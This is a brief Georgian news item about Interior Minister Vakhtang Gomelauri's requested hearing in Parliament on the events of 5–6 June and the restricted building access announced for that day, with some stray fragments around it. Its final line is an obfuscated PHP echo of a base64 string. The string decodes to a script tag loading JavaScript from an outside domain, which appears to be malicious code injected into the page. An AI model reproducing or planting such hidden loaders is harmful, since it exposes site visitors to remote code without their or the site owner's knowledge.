celsiusi
ავერსი საქკაბელი
საქართველოს პარლამენტში დღეს საქართველოს შინაგან საქმეთა ვახტანგ გომელაურს მოუსმენენ. რიგგარეშე სესია საკანონმდებლო ორგანოში 12:00 საათზეა ჩანიშნული.
 
გომელაურმა მოსმენის თხოვნით პარლამენტს თავად მიმართა. ის აპირებს ისაუბროს 5–6 ივნისს განვითარებულ მოვლენებსა და ამ პერიოდში სამინისტროს მიერ გატარებულ ღონისძიებებზე.
 
გომელაურის პარლამენტში მისვლის დროისთვის მიმდებარე ტერიტორიაზე იკრიბებიან მედიის წარმომადგენლები. ჟურნალისტ ვახო სანაიას განცხადებით, ისინი აპირებენ შევიდნენ საკანონმდებლო ორგანოში.
 
დაგეგმილი მოვლენების პარალელურად დღეს დილით პარლამენტის აპარატმა გაავრცელა განცხადება “უსაფრთხოების დამატებითი ზომების შესახებ”. მათი თქმით, დღეს საკანონმდებლო ორგანოში დაშვების შეზღუდული რეჟიმი იმოქმედებს.
 
“იმოქმედებს პარლამენტის შენობაში დაშვების შეზღუდული რეჟიმი, გარდა მედიის წარმომადგენლებისა, რომელთა დაშვება ჩვეულ რეჟიმში განხორციელდება წინასწარ შეთანხმებული გადამღები ჯგუფების რაოდენობისა და საშვების საფუძველზე.
 
აღნიშნული ღონისძიების მიზანია შესაძლო პროვოკაციების პრევენცია და საქართველოს პარლამენტის წევრებისა და აპარატის თანამშრომლებისთვის სამუშაო პირობების უზრუნველყოფა”,– ნათქვამია განცხადებაში.
942
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");